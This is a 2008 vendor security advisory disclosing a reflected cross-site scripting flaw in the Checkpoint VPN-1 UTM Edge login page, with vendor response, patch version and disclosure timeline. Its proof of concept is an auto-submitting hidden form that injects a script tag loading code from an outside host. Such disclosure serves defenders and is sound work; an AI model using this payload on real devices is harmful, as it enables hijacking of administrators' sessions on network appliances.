Louhi Networks
                          Security Advisory


      Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting
  Release Date: 2008/03/06
Last Modified: 2008/03/06
       Authors: Henri Lindberg, Associate of (ISC)²
                [henri.lindberg@louhi.fi]

   Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x
                (patched in version 7.5.48)
       Devices: Checkpoint VPN-1 UTM Edge
   Attack type: Cross site scripting (non-persistent)
          Risk: Low
Vendor Status: Vendor has released an updated version
    References: http://www.louhi.fi/advisory/checkpoint_080306.txt


Overview:

    Quote from http://www.checkpoint.com/
    "VPN-1 UTM Edge appliances deliver unified threat management to
     enterprises with branch offices and simplify security deployments
     and manageability. VPN-1 UTM Edge appliances consolidate proven
     enterprise-class technology into a single branch office solution
     that does not compromise the corporate network and eliminates the
     branch office as your weakest link. As part of Check Point's Unified
     Security Architecture, VPN-1 UTM Edge can enforce a global security
     policy and allows administrators to manage and update thousands of
     appliances as easily as managing one."

    Insufficient input validation and output encoding on the login page
    allows attacker to perform html-injection by posting suitable string
    to the login form handler. The injection leads to reflected
    pre-authentication cross site scripting.


Details:
    Form based authentication is used only when device is accessed using
    HTTP. Authentication over HTTPS uses HTTP basic authentication.

    The device does not accept the parameters in a GET request, POST
    request has to be used instead - exploiting the XSS vulnerability
    requires therefore a bit more effort compared to ordinary GET based
    reflected cross site scripting vulnerability.

    The current version can be checked from
    http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
    address of the device. The page also displays current product key.

Vendor response:

    "Once users register the appliance and connect to the service center
    (Safe@Office appliances), the latest firmware is automatically
    downloaded to their appliance. For UTM-1 Edge appliances, the latest
    firmware version can be downloaded from the Check Point download
    center. Currently, this is version 7.5.48 that does not contain the
    reported issue. We believe that customers are not exposed to this
    issue."

Proof of Concept:

<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<input name="user" value="'&lt;script/src=//l7.fi&gt;&lt;/script&gt;">

</form>
</body>
</html>



Solution:

    Update to version 7.5.48


Disclosure Timeline:

    19.  February 2008    - Contacted Checkpoint by email
    20.  February 2008    - Vendor response.
    6.      March 2008    - Advisory was released

Copyright 2008 Louhi Networks Oy. All rights reserved.